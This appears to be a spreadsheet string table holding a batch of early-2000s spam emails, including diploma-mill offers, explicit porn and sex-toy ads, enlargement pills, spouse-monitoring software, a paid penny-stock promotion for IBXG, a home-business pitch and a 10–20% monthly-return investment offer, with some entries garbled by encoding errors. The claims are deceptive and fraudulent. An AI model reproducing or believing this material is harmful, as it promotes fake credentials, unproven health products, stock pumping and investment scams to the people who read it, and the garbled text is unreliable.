                and the respect of all?
We 
                  can assist with Diplomas from prestigious non-accredited universities 
                  based on your present knowledge and life experience.
No required tests, classes, books, or 
                interviews. 
Bachelors, 
                masters, MBA, and doctorate (PhD) diplomas available in the field 
                of your choice - that's right, you can become a Doctor, Lawyer or Accountant and receive 
                all the benefits and admiration that comes with it!
No 
                one is turned down!
Confidentiality 
                assured - Change your Life Today!
                  Either Click Here or 
                  you can call us 24 hours a day, 7 days a week! (including 
                  Sundays and holidays):
1 - 213 - 947 - 1009  Contact 
                us NOW to receive your diploma within days, and start improving 
                your life!Did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
</t>
  </si>
  <si>
    <t xml:space="preserve">
** Adult Related Site, You must be 18 years of age to enter. **
If you are offended by this e-mail please delete now.
*****************************************************************
Enjoy Better Sex With Our Adult Toys. 
Shop In The Privacy Of Your Own Home.
*****************************************************************
Come visit the most extensive adult site on 
the internet.  There are over 1600
high quality adult products to view on-line.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On-line, Fax, or US Mail.
*We ship Federal Express 2-day at no extra shipping charge.
CLICK HERE
What Are You Waiting For?
THIS SITE CONTAINS XXX-RATED SEXUALLY EXPLICIT MATERIAL INTENDED FOR 
ADULTS. DO NOT ENTER IF YOU ARE NOT 18 YEARS OF AGE OR OLDER, IF ADULT 
LANGUAGE AND NUDITY OFFENDS YOU, OR IF YOU ARE ACCESSING OUR SITE FROM 
ANY COUNTRY AND/OR STATE WHERE ADULT MATERIAL IS SPECIFICALLY PROHIBITED 
BY LAW.
This message is sent in compliance of the new e-mail bill: SECTION 301. 
Per Section 301, Paragraph (a)(2)(C) of S. 1618.Further transmissions to you by the sender of this email may be stopped 
at no cost to you by sending a reply to this email address "forgetitpal1@yahoo.ca" with the 
word "your email address" in the subject line. 
----------------------- Headers --------------------------------
Return-Path: 
Received: from  rly-zc01.mx.aol.com (rly-zc01.mail.aol.com [172.31.33.1]) by air-zc04.mail.aol.com (v76_r1.3) with ESMTP; Sun, 3 May 2001 13:13:19 -0400
Received: from  216.36.194.171 ([216.36.194.171]) by rly-zc01.mx.aol.com (v75_b3.9) with ESMTP; Sun, 3 May 2001 17:13:33 -0400
Received: from aiis.com (aiis.com [137.100.253.1]) by 216.36.194.171 (8.9.3/8.9.1) with ESMTP id DAA9698; Sun, 3 May 2001 13:13:33 -0400
To: sampre435 
From: 
Reply-to: newsalesjob@accessatlanta.com
X-Accept-Language: en
Subject: Good Vibrations !!!                                                                uyiju
Date: Sun, 3 May 2001 13:13:33 -0400
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
X-Mailer:  Mozilla 4.51 [en] (Win98; I) ver.ï¿½ï¿½ï¿½ï¿½ [Final Build]
ebedaxegunupazejokupodokakafohacejakelofupobibekejubinepunoqowobavikabicijademisolofudovimekebemuvubukalofizibokijijihab</t>
  </si>
  <si>
    <t xml:space="preserve">New amazing incest show on Hot-Babies-Live.ComAge: 18
Height 165 cms
Weight: 45 kg
Hair Color: Brunette
Eye Color: Blue
Chest Size: 1
Sexual Preference: Bi
Age: 22
Height 172 cms
Weight: 50 kg
Hair Color: Blonde
Eye Color: Green
Chest Size: 2
Sexual Preference: Bi
Â Â Â Â New amazing incest showÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â on Hot-Babies-Live.Com
Hot-Babies-Live.com is a new porno site where you can see porno show in real time.
Hot-Babies-Live.com presents you a unique chance to manage a private show with a real time live video chat according to your personal erotic fantasies.
Now Hot-Babies-Live.com has organized a new show. All your sexual wishes will be fulfilled in real time by two sisters from Russia, Janna and Natasha. They are not only real sisters, they are the youngest models in Hot-Babies-Live.com!Janna has just become 18! Click here to check it out!
They pet each other, lick each other and fuck each other when you ask. They will never refuse. They are always full of enthusiasm and desire. They will turn you on in minutes!
						Now you can see their porno show and private recordings absolutely free! See their young sexuality by yourself!
						If you are not a member of Hot-Babies-Live.com club, hurry up to join now.
You can do it cheaper than ever now!
This offer is available for a limited time only!This letter is NOT A SPAM! You have received it because your "A-Email NewsLetter" subscription is active. To check your subscription status or to unsubscribe, use this link:
http://a-email.newsletters.ckync.comÂ Â 
</t>
  </si>
  <si>
    <t xml:space="preserve">
Guaranteed to increase, lift and firm your
breasts in 60 days or your money back!!100% herbal and natural.  Proven formula since 1996.  
Increase  your bust by 1 to 3 sizes within 30-60 days 
and be all natural.  Click here:
http://www.freehostchina.com/ultrabust/cablebox2002/Absolutely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mailto:standardoptout@x263.net?Subject=REMOVE
</t>
  </si>
  <si>
    <t xml:space="preserve">
FIND OUT WHO THEY ARE CHATTING/EMAILING WITHFOR ALL THOSE HOURS!Is your spouse cheating online?  Are your kids talking to dangerous people
 on instant messenger?FIND OUT NOW with
 Big Brotheravailable as an instant software download.
ONLY $39.95 Click Here To Order 
Please click here if you would like to be removed from this list.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</si>
  <si>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The United States has a program, called Diversity Immigrant Visa
Lottery (better known as the Green Card Lottery), making available
each year by random selection 50,000 permanent residence visas
(Green Cards) to people from around the world. The objective of the
program is to issue Green Cards to individuals born in countries with
historically low levels of immigration to the United States.
A Green Card is a Permanent Residence Visa of the U.S.A. A Green Card
will give you legal right to work and live permanently in the United
States. Green Card holders receive health, education, and several other
benefits. If you win a Green Card, you can apply for U.S. Citizenship at
a later time. The Green Card does not affect your present citizenship.
You and your family could be lucky winners!
Your email address was obtained from a purchased list, Reference # 00193.  If you wish to unsubscribe
from this list, please Click Here.
If you have previously unsubscribed and are still receiving this message, you may email our
Abuse Control Center, or call 1-888-763-2497,
or write us at: NoSpam, 6484 Coral Way, Miami, FL, 33155.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</si>
  <si>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GO BIGGO
        BIG......SUPERSIZE TODAY!!!        ** Do you want a larger and firmer penis?
        ** Do you want to give your partner more pleasure?
        ** Do you want to stay ROCK HARD longer?
        ** Do you want PERMANENT results?        Our Doctor-Approved Pill Will Enlarge Your Penis and improve your
        erection &amp; your sexual desire!100% GUARANTEED!        Believe it or not, it is now possible for you to naturally boost your
        sexual desire and performance without a prescription! VP-RX is a safe
        and natural alternative to prescription drugs. If you suffer from
        erectile dysfunction or would just like to improve your sex drive and
        sexual function, you owe it to yourself and your partner to take a
        closer look at VP-RX.        To learn more about the benefits of VP-RX. Click
        Here
This
        is a one time mailing.Â  You are receiving this information
        because your email address was subscribed to a list of people interested
        in similar products. If you wish to unsubscribe to future information
        from this list, please submit a request to the following link UNSUBSCRIBE.Â 
Â 
Â 
</t>
  </si>
  <si>
    <t xml:space="preserve">Date: Tuesday, July 9, 2002IBXG E-mailer 7/9/02  Rapid 
        Growth Health Care Company: Stock Symbol ï¿½IBXGï¿½ Trading Around 
        16 Cents 
        Market Watch CorporationREVENUES 
        TO SOAR OVER 500% TO $18 MILLION FOR 
        OTC-BB "IBXG" 
        ACQUISITION OF TWO CYBERCARE, INC. OPERATING UNITS MOVES FORWARD 
OTC-BB Symbol: IBXG
Shares Outstanding (est.):
38,983,380
Float (est.): 7,887,966
Recent Price: 16 cents
Year Low/High:
$0.10 - $0.90
Contact: 561-998-3435
Websites: Market 
        Watch Corporation, iBX Group, Inc.
Press Releases:
IBXG 
        Press Releases
 A 
        Situation That Could Revolutionize the Health Care Industry
  STRONGï¿½HEALTHï¿½CAREï¿½SECTORï¿½GROWTH 
              ï¿½Most investors desire to be in a stock from the beginning 
              of its growth, ï¿½IBXGï¿½ is one of those opportunities. 
              Revenues to increase over 500 % 
              to over $18 Million from $3 Million with its 
              pending acquisition of 47 physical therapy outpatient centers and 
              institutional pharmacy businesses, currently owned by CyberCare, 
              Inc. ï¿½IBXGï¿½ also just announced a national alliance 
              with Patient-Pay.com 
              that will enable ï¿½IBXGï¿½ to market its services on a 
              national scale. We believe the potential is enormous for this expanding 
              dynamic Health Care Information Technology Company.HEALTHï¿½CAREï¿½SECTORï¿½REREPRESENTSï¿½15%ï¿½OFï¿½THEï¿½TOTALï¿½US 
              GROSSï¿½DOMESTICï¿½PRODUCT While inflation 
              in the US has been around 2% per year, the US Health Careï¿½s 
              inflationary rate rose over 11% per year. Health care costs are 
              spiraling out of control. ï¿½IBXGï¿½ provides technology 
              based products and services in full compliance with newly mandated 
              government requirements (HIPAA), that help medical professionals 
              save time and money, by utilizing ï¿½IBXGï¿½s state of the 
              art systems.UNDERSTANDINGï¿½HIPAA 
              The Health Insurance Portability and Accountability Act of 1996 
              (Publicï¿½Lawï¿½104-191), 
              also known as HIPAA, was enacted as part of a broad Congressional 
              attempt at incremental healthcare reform. Part of the law requires 
              the US Dept. of Health and Human Services (DHHS) to develop standards 
              and requirements for maintenance and transmission of health information 
              that identifies individual patients. The requirements outlined by 
              the law are far-reaching for all healthcare organizations that maintain 
              or transmit electronic health information must comply. ï¿½IBXGï¿½ 
              offers all health care providers with a viable, already in place 
              solution to ï¿½HIPAAï¿½ compliance.IBXGï¿½ï¿½SPECIALIZESï¿½INï¿½HEALTHï¿½DATAï¿½MANAGEMENT 
              It is a huge market comprised of over one million health care professionals. 
              This company has emerged, with solutions to many problems facing 
              the Health Care Industry, by providing health care professionals 
              the ability to deliver outstanding patient care with optimum efficiency. 
              In past years, venture capitalists have invested more than $20 billion 
              in information technology companies, confirming a very large financial 
              interest in the health care sector.              WILLï¿½IBXGï¿½REVOLUTIONIZEï¿½THEï¿½HEALTHï¿½CAREï¿½INDUSTRY? 
              They could. Virtually every aspect of the way health care is delivered 
              is impacted in a positive fashion, by IBXG's technology. IBXG has 
              developed and deployed innovative, cost-effective methods for integrating 
              financial, administrative and information services for the health 
              care industry. Utilizing in-house development capabilities combined 
              with the latest technologies and Internetï¿½based communication 
              services, ï¿½IBXGï¿½ assists hospital-based physician groups, 
              multi-physician specialty practice and health care service organizations 
              in managing the efficiency of account receivable, workflow and compliance.virtually 
              every aspect of the way health care is delivered. Imagine your doctor 
              being able to access your medical records from any location, anywhere 
              in the world . . . instantly! 
 OUTSTANDING 
            RECENT DEVELOPMENTS Revenues to increase over 500% to $18 
                MILLION. 
 National alliance with Patient-Pay.Com. 
               Wall Street Corporate Reporter interview, available 
                here 
                July 15, 2002. 
               Significant gains in quarterly year to year revenues.
               Extension of agreements with Intracoastal Health Systems and 
                Providence Hospital (one of Ascension 
                Health Groupï¿½s 87 affiliated hospitals). 
               Increased revenues with Cerberus Capital Management, L.P.,a 
                multi-billion dollar New York hedge fund. 
               Service contract with MDVIP, 
                MDVIP was featured in an NBC Nightly News Tom 
                Brokaw interview. 
               Acquired Sportshealthnet.com. 
               Contract with award winning software company, Millbrook 
                Software Corporation for additional revenue. 
               Two national product launches were announced, one for the
$1.5 BILLION durable medical equipment industry and the 
                other a proprietary online consumer medical reports and information 
                service. 
               Alliance with Sun 
                Capital that will allow IBXG to offer accounts receivable 
                funding programs nationwide. 
               Extended partnership alliance with Advanced Information Technologies 
                that taps the $5 BILLION document management industry. 
               Alliance with Digital 
                Ingenuity to provide Internet- protocol telephony 
                services (a billion-dollar industry).
Disclaimer 
        &amp; Disclosure: Market Watch Corporation is not a registered 
        financial advisory. The information presented by Market Watch Corporation 
        is not an offer to buy or sell securities. Market Watch Corporation accumulates 
        information based from public sources and the advertised company, then 
        distributes opinions and comments. Penny stocks are considered to be highly 
        speculative and may be unsuitable for all but very aggressive investors. 
        Market Watch Corporation may hold positions in companies mentioned and 
        may buy or sell at any time. This profile of IBXG was a paid advertisement 
        by IBXG. IBXG has paid Market Watch Corporation $3,500 for this advertisement 
        and 750,000 restricted shares for investor awareness services for one 
        year, an affiliated company of Market Watch Corporation has been paid 
        250,000 restricted shares of IBXG stock from a third party shareholder. 
        Please always consult a registered financial advisor before making any 
        decisions. Information within this advertisement contains forward looking 
        statements within the meaning of Section 27(e) of the U.S. Securities 
        Act of 1933 and Section 21(g) of the U.S. Securities Exchange Act of 1934 
        and the Private Securities Litigation Reform Act Of 1995.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We encourage our readers to invest carefully and read the investor information 
        available at the Web sites of the U.S. Securities and Exchange Commission 
        (SEC) at http://www.sec.gov and/or the 
        National Association of Securities Dealers (NASD) at http://www.nasd.com. 
        Readers can review all public filings by companies at the SECï¿½s 
        EDGAR page. The NASD has published information on how to invest carefully 
        at its Web site.
ï¿½
ï¿½You are receiving 
      this message because you subscribed on one of our partner sites using the 
      refer a friend page. We value privacy as our clients demand it and weï¿½ 
      will gladly unsubscribe you upon request. To send a request, simply
      click here and follow directions. We 
      guarantee that you will be unsubscribed within 48 hours. Nurel is 
      only the delivery source for this message.ï¿½ Under SEC rules, we are 
      required to inform you that we were paid three thousand five hundred 
      dollars (US) for our services which is limited to the delivery of this 
      message only. Thank you.(c) 2002 Nurel
ApplyLeads v3.2 Commercial E-mail List Manager.
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t>Dietary Supplement</t>
  </si>
  <si>
    <t xml:space="preserve">
BODY {font-family="Arial"}
TT {font-family="Courier New"}
BLOCKQUOTE.CITE {margin:0; padding-left:0.5em; border-left:2px solid;}
SPAN.TABOOHEADER {display=none}Online Loan Service
What Are You Waiting For?
Rates Have Dipped....Approvals Are Up!
7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charge!We apologize for any email you may have inadvertently received.
Please
CLICK HERE 
to opt out from future newsletters.
3306SnFA9-534Qdds6061tMjd7-620hqjk9202PsjV2-730TRrJ6475DcBP4-940nOXl636994YWQc4-053aezr3235JQNT4-931TqbP7290KRAG6-779Wszt1190YChQ5-469XNmg8494hgBl71</t>
  </si>
  <si>
    <t xml:space="preserve">Serious professionals only* * * DOW JONES UNDER 10,000 * * * NASDAQ REMAINS UNDER 2000 * * * TECH INDUSTRY LAYOFFS * * * FED CUTS RATES AGAIN TO AVOID RECESSION * * * AOL LAYS OFF 1100 * * *Are you a trained professional who workshard to provide for your family?
Are you at all concerned about:
The current economy?The current job market?Your family's future?Your retirement?Â Does this also describeyou?
Â 
A working professional providing for your family
College educated and over 5 years of professional experience
Looking to add extra income - by working from home
NOT interested in any multi level marketing effort or expensive franchise
NOT interested in contacting anyone you know to sell any productor opportunity
Concerned about the recent softness in the economy and the jobmarket
Interested in adding significant extra income to improve thequality of your life
Willing to put in the hours, investment and time needed if youwere sure that this was for you
Â If you can identify with what weare talking about, and you are a skilled professional looking tomaximize whatever spare time you might have to increase your income,
Then take a moment and fill outthe form below.Â  I would like to show you how you can make anadditional $100,000 per year, from the comfort ofÂ  your home,Â WITHOUT MLM's, MONEY GAMES or PYRAMIDSCHEMES.Â 
This is a professional homebased business opportunity.Â  You will be fully trained andsupported in your new enterprise.Â  We have a state of the artmarketing system for your use,Â  which will help you in yourefforts.
Â 
I am looking to teach a handful of people what I havelearned about making a significant monthly profit through DESIRE andDIRECT SALES.Â  This is a serious financial product and it WILLcreate serious income for you if you have the drive to create it.
We have NO quotas, silly commission charts to learnor gimmicky tricks.Â  This is serious business for the seriousperson.
***********************
Call Today!
1-888-406-6041
************************
Â Â Â Â remove click here
After 12 years on Wall Streetas a VP, I am glad I started this home based business.Â  This is aserious financial product that changes the lives of those I introduce itto.Â  I no longer work on Wall Street.Â Â  I make the moneyI made and more.Â  I'm finally living the life of my dreams . . . Kevin from NYC
Â 
Call Today!
1-888-406-6041
************************
Â 
</t>
  </si>
  <si>
    <t xml:space="preserve">
BODY {font-family="Arial"}
TT {font-family="Courier New"}
BLOCKQUOTE.CITE {margin:0; padding-left:0.5em; border-left:2px solid;}
SPAN.TABOOHEADER {display=none}Online Loan Service
What Are You Waiting For?
Rates Have Dipped....Approvals Are Up!
7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charge!We apologize for any email you may have inadvertently received.
Please
CLICK HERE 
to opt out from future newsletters.
9455qyBX6-240Yxfy9620HnbI4-618JPZu7866ZfVB3-590sOHD5982LDnl552163euDu5-512jPdy6605FwVf4-771cAuR6578vpMg9-113Zl45</t>
  </si>
  <si>
    <t xml:space="preserve">Below is the result of your feedback form.  It was submitted by
 (SafeInvestments@NiceReturns12.com) on Saturday, July 13, 2002 at 03:46:17
---------------------------------------------------------------------------Looking for a high return on your money?: .10%-20% Monthly Return On Your Secure Investment : . Audited From Multiple Agencies : .Start with as little as $500 dollars and start earning returns monthly!: .For Complete Details Email: MarylandClub@mol.mn : .To be removed email: RemoveFromList@Inbox.lv : .---------------------------------------------------------------------------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</si>
  <si>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ï¿½ï¿½ï¿½nï¿½Nï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½zï¿½Iï¿½pï¿½Gï¿½ï¿½ï¿½sï¿½iï¿½Hï¿½ï¿½ï¿½zï¿½ï¿½ï¿½ï¿½ï¿½xï¿½Zï¿½Aï¿½bï¿½ï¿½ï¿½`ï¿½Pï¿½ï¿½ï¿½p!!!ï¿½ï¿½ï¿½hï¿½ï¿½ï¿½ï¿½!!ï¿½ï¿½ï¿½ï¿½!~~ï¿½Oï¿½Aï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Fï¿½Iï¿½zï¿½ï¿½ï¿½bï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½tï¿½ï¿½ï¿½ï¿½ï¿½Xï¿½ï¿½ï¿½Hï¿½tï¿½ï¿½ï¿½Hï¿½Cï¿½ï¿½ï¿½ï¿½ï¿½Xï¿½ï¿½ï¿½ï¿½ï¿½Aï¿½ï¿½ï¿½Mï¿½nï¿½Hï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½^ï¿½Qï¿½ï¿½ï¿½Aï¿½R4ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Xï¿½ï¿½ï¿½ï¿½ï¿½ï¿½1ï¿½xï¿½ï¿½ï¿½ï¿½ï¿½Aï¿½tï¿½ï¿½ï¿½ï¿½ï¿½Mï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Oï¿½ï¿½ï¿½ï¿½ï¿½Rï¿½ï¿½ï¿½tï¿½ï¿½ï¿½ï¿½ï¿½Xï¿½Fï¿½Aï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½tï¿½ï¿½ï¿½eï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Xï¿½ï¿½ï¿½~ï¿½ï¿½ï¿½wï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½tï¿½Fï¿½Aï¿½ï¿½ï¿½pï¿½Sï¿½ï¿½ï¿½@ï¿½~ï¿½Oï¿½Tï¿½Aï¿½ï¿½ï¿½Iï¿½{ï¿½bEPSONï¿½tï¿½Cï¿½ï¿½ï¿½Aï¿½Zï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Xï¿½@ï¿½ï¿½170ï¿½ï¿½ï¿½Aï¿½mï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Xï¿½@ï¿½ï¿½190ï¿½ï¿½ï¿½Aï¿½Oï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½tï¿½ï¿½ï¿½ï¿½ï¿½Xï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½@ï¿½bï¿½Aï¿½ï¿½ï¿½tï¿½ï¿½ï¿½|ï¿½ï¿½ï¿½ï¿½ï¿½@ï¿½Aï¿½Gï¿½ï¿½ï¿½Xï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Rï¿½ï¿½ï¿½t1ï¿½ï¿½ï¿½ï¿½ï¿½Kï¿½yï¿½@ï¿½bï¿½Iï¿½sï¿½yï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½oï¿½ï¿½ï¿½ï¿½ï¿½jï¿½Lï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Lï¿½ï¿½ï¿½ï¿½ï¿½qï¿½cï¿½ï¿½ï¿½ï¿½ï¿½pï¿½Lï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Oï¿½ï¿½
ï¿½sï¿½yï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½oï¿½ï¿½ï¿½ï¿½ï¿½jï¿½Lï¿½ï¿½ï¿½ï¿½         ï¿½Oï¿½ï¿½ï¿½ï¿½ï¿½ï¿½             ï¿½ï¿½ï¿½ï¿½ï¿½Oï¿½ï¿½ï¿½iï¿½Oï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½jï¿½ï¿½ï¿½Uï¿½aï¿½tï¿½P(EPSONï¿½BHPï¿½BCANON)ï¿½ï¿½ï¿½qï¿½ï¿½ï¿½ï¿½ï¿½eï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Xï¿½Aï¿½Pï¿½Pï¿½ï¿½ï¿½ï¿½ï¿½Sï¿½Oï¿½uï¿½fï¿½ï¿½ï¿½qï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½|ï¿½ï¿½ï¿½ï¿½ï¿½[ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½lï¿½Aï¿½Bï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Rï¿½ï¿½ï¿½qï¿½hï¿½ï¿½ï¿½Aï¿½@ï¿½ï¿½ï¿½Kï¿½Oï¿½fï¿½eï¿½ï¿½ï¿½ï¿½ï¿½Aï¿½ï¿½ï¿½Fï¿½fï¿½ï¿½ï¿½Iï¿½ï¿½(ï¿½wï¿½tï¿½lï¿½ï¿½ï¿½ï¿½ï¿½Oï¿½Tï¿½Aï¿½ï¿½ï¿½@ï¿½~)ï¿½I
ï¿½ï¿½ï¿½ï¿½ï¿½nï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½q(mail)ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½qï¿½ï¿½ (ï¿½ï¿½ï¿½qï¿½ï¿½ï¿½ï¿½ï¿½iï¿½}ï¿½ï¿½ï¿½oï¿½ï¿½) ï¿½I
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Ghttp://hk.geocities.com/lijaytw/index.htm ï¿½iï¿½bï¿½ï¿½ï¿½ï¿½ï¿½Wï¿½qï¿½ï¿½ï¿½I
ï¿½qï¿½fï¿½Mï¿½uï¿½G07-3481489 / FAXï¿½G07-9732420 / emailï¿½Gfen6049@yahoo.com.tw     
ï¿½@ï¿½BEPSONï¿½ï¿½ï¿½ï¿½ï¿½Xï¿½tï¿½Cï¿½Gï¿½@ï¿½ï¿½ï¿½ï¿½ï¿½R5ï¿½ï¿½ï¿½Hï¿½Wï¿½Nï¿½iï¿½ï¿½ï¿½Eï¿½ï¿½ï¿½uï¿½fï¿½F10ï¿½ï¿½ï¿½Hï¿½Wï¿½ï¿½ï¿½ï¿½ï¿½Kï¿½ï¿½ï¿½uï¿½fï¿½I
ï¿½Gï¿½BEPSONï¿½ï¿½ï¿½ï¿½ï¿½Xï¿½ï¿½ï¿½fï¿½ï¿½ï¿½tï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½oISO9001ï¿½{ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½qï¿½Aï¿½ï¿½ï¿½~ï¿½ï¿½ï¿½Hï¿½uï¿½ï¿½ï¿½ï¿½ï¿½`ï¿½]ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Aï¿½Dï¿½@ï¿½ï¿½ï¿½Hï¿½ï¿½ï¿½Rï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½`ï¿½ï¿½ï¿½Cï¿½~ï¿½ï¿½ï¿½iï¿½ï¿½ï¿½ï¿½ï¿½Fï¿½ï¿½HPï¿½ï¿½ï¿½ï¿½ï¿½Xï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Xï¿½ï¿½ï¿½ï¿½ï¿½oISO14000ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Oï¿½{ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Bï¿½^ï¿½sï¿½yï¿½ï¿½ï¿½iï¿½fï¿½Aï¿½ï¿½ï¿½~ï¿½ï¿½ï¿½gï¿½Yï¿½ï¿½ï¿½~ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Cï¿½Lï¿½ï¿½ï¿½ï¿½ï¿½Aï¿½~ï¿½ï¿½ï¿½iï¿½Bï¿½ï¿½ï¿½ï¿½ï¿½tï¿½ï¿½ï¿½~ï¿½A100%ï¿½~ï¿½ï¿½ï¿½Oï¿½ï¿½ï¿½I
ï¿½Tï¿½Bï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½~ï¿½ï¿½ï¿½ï¿½ï¿½Oï¿½Tï¿½ï¿½ï¿½~ï¿½ï¿½ï¿½Oï¿½ï¿½:ï¿½ï¿½ï¿½ï¿½ï¿½Wï¿½Yï¿½ï¿½ï¿½ï¿½ï¿½D,ï¿½hï¿½Lï¿½ï¿½ï¿½ï¿½ï¿½@ï¿½ï¿½ï¿½@ï¿½ï¿½ï¿½ï¿½ï¿½sï¿½~ï¿½Aï¿½Yï¿½ï¿½ï¿½Oï¿½ï¿½ï¿½ï¿½ï¿½Nï¿½Aï¿½ï¿½ï¿½iï¿½Hï¿½ï¿½ï¿½ï¿½ï¿½hï¿½Oï¿½C
ï¿½|ï¿½Bï¿½xï¿½Wï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½iï¿½qï¿½ï¿½ï¿½Aï¿½Bï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Rï¿½ï¿½ï¿½qï¿½hï¿½ï¿½ï¿½Aï¿½@ï¿½ï¿½ï¿½Kï¿½Oï¿½fï¿½eï¿½ï¿½ï¿½ï¿½ï¿½Aï¿½ï¿½ï¿½Fï¿½fï¿½ï¿½ï¿½~ï¿½Iï¿½ï¿½ï¿½Iï¿½iï¿½}ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½oï¿½ï¿½ï¿½iï¿½|ï¿½tï¿½pï¿½jï¿½I
EPSON ï¿½tï¿½C  ï¿½ï¿½ï¿½ï¿½ï¿½X 
ï¿½iï¿½ï¿½ï¿½ï¿½ï¿½Xï¿½sï¿½ï¿½/ ï¿½Cï¿½ï¿½ï¿½j         /          ï¿½A ï¿½ï¿½ ï¿½ï¿½ ï¿½ï¿½              /            ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½ï¿½n
ï¿½iS020034 ï¿½ï¿½ï¿½ï¿½ï¿½jEpson Stylus Colorï¿½BProï¿½BProXLï¿½BProXL+   ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½250 ï¿½ï¿½ï¿½n
ï¿½iS020036 ï¿½mï¿½ï¿½ï¿½jEpson Stylus Colorï¿½BProï¿½BProXL  ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½350 ï¿½ï¿½ï¿½n
ï¿½iS020039 ï¿½ï¿½ï¿½ï¿½ï¿½jEpson Stylus 400/800/800+/1000  ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½170 ï¿½ï¿½ï¿½n
ï¿½iS020047 ï¿½ï¿½ï¿½ï¿½ï¿½jEpson Stylus 200/820/Color200/II/IIs ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½250 ï¿½ï¿½ï¿½n
ï¿½iS020049 ï¿½mï¿½ï¿½ï¿½jEpson Stylus 820/1500/1500C    Epson Stylus Color II/II S ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½190 ï¿½ï¿½ï¿½n
ï¿½iS020089 ï¿½mï¿½ï¿½ï¿½jEpson Stylus Color 400/600/800/850/1520 ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½190 ï¿½ï¿½ï¿½n
ï¿½iS020093 ï¿½ï¿½ï¿½ï¿½ï¿½jEpson Stylus Color 400/500/600  Stylus Photo700/Photo710/Photo EX /Photo EX2   IP100 ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½170 ï¿½ï¿½ï¿½n
ï¿½iS020097 ï¿½mï¿½ï¿½ï¿½jEpson Stylus 200    Epson Stylus Color 200/500 ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½190 ï¿½ï¿½ï¿½n
ï¿½iS020108 ï¿½ï¿½ï¿½ï¿½ï¿½jEpson Stylus Color 800/850/1520 ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½170 ï¿½ï¿½ï¿½n
ï¿½iS020110 ï¿½mï¿½ï¿½ï¿½jEpson Stylus Photo700/710/ EX/  EX2   IP100 ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½190 ï¿½ï¿½ï¿½n
ï¿½iS020118 ï¿½ï¿½ï¿½ï¿½ï¿½jEpson Stylus Color 3000  ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½800 ï¿½ï¿½ï¿½n
ï¿½iS020122 ï¿½ï¿½ï¿½ï¿½ï¿½jEpson Stylus Color 3000  ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½800 ï¿½ï¿½ï¿½n
ï¿½iS020126 ï¿½ï¿½ï¿½ï¿½ï¿½jEpson Stylus Color 3000  ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½800 ï¿½ï¿½ï¿½n
ï¿½iS020130 ï¿½ï¿½ï¿½ï¿½ï¿½jEpson Stylus Color 3000  ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½800 ï¿½ï¿½ï¿½n
ï¿½iS020138 ï¿½ï¿½/ï¿½mï¿½ï¿½ï¿½jEpson Stylus Color 300  ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½190 ï¿½ï¿½ï¿½n
ï¿½iS020187 ï¿½ï¿½ï¿½ï¿½ï¿½jEpson Stylus Color 440/460/640/660/670 Photo 720/750/1200/EX3 ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½170 ï¿½ï¿½ï¿½n
